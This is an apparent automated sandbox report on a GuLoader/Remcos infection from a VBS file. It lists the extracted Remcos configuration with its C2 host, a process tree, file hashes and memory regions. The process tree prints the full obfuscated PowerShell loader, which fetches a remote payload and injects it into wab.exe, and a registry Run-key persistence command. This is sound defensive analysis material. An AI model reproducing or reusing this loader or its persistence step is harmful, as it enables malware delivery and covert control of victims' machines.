Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 15:29

General

  • Target

    Swift 2024052130819616.vbs

  • Size

    13KB

  • MD5

    693d91041a54a578ada0c38a77634ee9

  • SHA1

    13e0a6c85203356af7d11ff4a0e74a6b9637f466

  • SHA256

    bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91

  • SHA512

    110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb

  • SSDEEP

    192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze

Malware Config

Extracted

Family

remcos

Botnet

MAY

C2

ab9001.ddns.net:9001

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    rm.exe

  • copy_folder

    Rm

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %UserProfile%

  • mouse_option

    false

  • mutex

    -L9O37N

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
        3⤵
          PID:2692
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
            4⤵
              PID:1572
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:676

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZCJV86C0MGD9C84TKO5P.temp

        Filesize

        7KB

        MD5

        b1d21c5b38c9569fb27e16cc57feb3a0

        SHA1

        e4d83a2847bc9c7806f8f130f625d8bb695ab22f

        SHA256

        cdc82a6a7045c51ec2a7b323b5718d78ed83ca1e7698a6ad1d8e76f2e0a70329

        SHA512

        9c533c9487629ce3715a2cb6d419b801a798748994b82677ba23cad9fce23df52b49971827f702b53fbebf9b6a2802078593ca77c8f8c798722adfcce3cc79e2

      • C:\Users\Admin\AppData\Roaming\Narco.Fla

        Filesize

        476KB

        MD5

        5b31fdcca43851229c6ad5c0d5124d9e

        SHA1

        95243324bfd6acd008518e233e5ac3a7a29e67a5

        SHA256

        c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842

        SHA512

        e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5

      • memory/2480-43-0x0000000001510000-0x00000000041DB000-memory.dmp

        Filesize

        44.8MB

      • memory/2480-42-0x00000000004A0000-0x0000000001502000-memory.dmp

        Filesize

        16.4MB

      • memory/2580-17-0x00000000066F0000-0x00000000093BB000-memory.dmp

        Filesize

        44.8MB

      • memory/2620-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

        Filesize

        4KB

      • memory/2620-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-18-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-19-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

        Filesize

        4KB

      • memory/2620-6-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

      • memory/2620-5-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

      • memory/2620-46-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB